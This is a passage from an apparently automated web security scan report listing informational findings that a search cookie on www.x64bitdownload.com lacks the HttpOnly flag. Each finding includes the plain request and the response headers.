The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-podcast-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91507


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.876. http://www.x64bitdownload.com/64-bit-posts-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-posts-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22posts%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22posts%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-posts-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22posts%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22posts%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89038


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.877. http://www.x64bitdownload.com/64-bit-rar-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rar-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-rar-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91323


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.878. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-reader-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-reader-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45335


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.879. http://www.x64bitdownload.com/64-bit-reader-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-reader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98206


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.880. http://www.x64bitdownload.com/64-bit-reading-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-reading-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-reading-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90299


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.881. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-rss-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30665


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.882. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-client-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-rss-client-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.883. http://www.x64bitdownload.com/64-bit-rss-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-rss-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:45 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88508


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.884. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-feed-reader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22rss-feed-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22rss+feed+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-rss-feed-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:53 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22rss-feed-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22rss+feed+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.885. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-reader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-rss-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:16 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99929


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.886. http://www.x64bitdownload.com/64-bit-search-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-search-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-search-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:22 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.887. http://www.x64bitdownload.com/64-bit-ssl-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ssl-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-ssl-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87821


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.888. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-synchronization-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-synchronization-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90120


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.889. http://www.x64bitdownload.com/64-bit-synchronize-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-synchronize-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-synchronize-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.890. http://www.x64bitdownload.com/64-bit-topic-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-topic-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22topic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22topic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
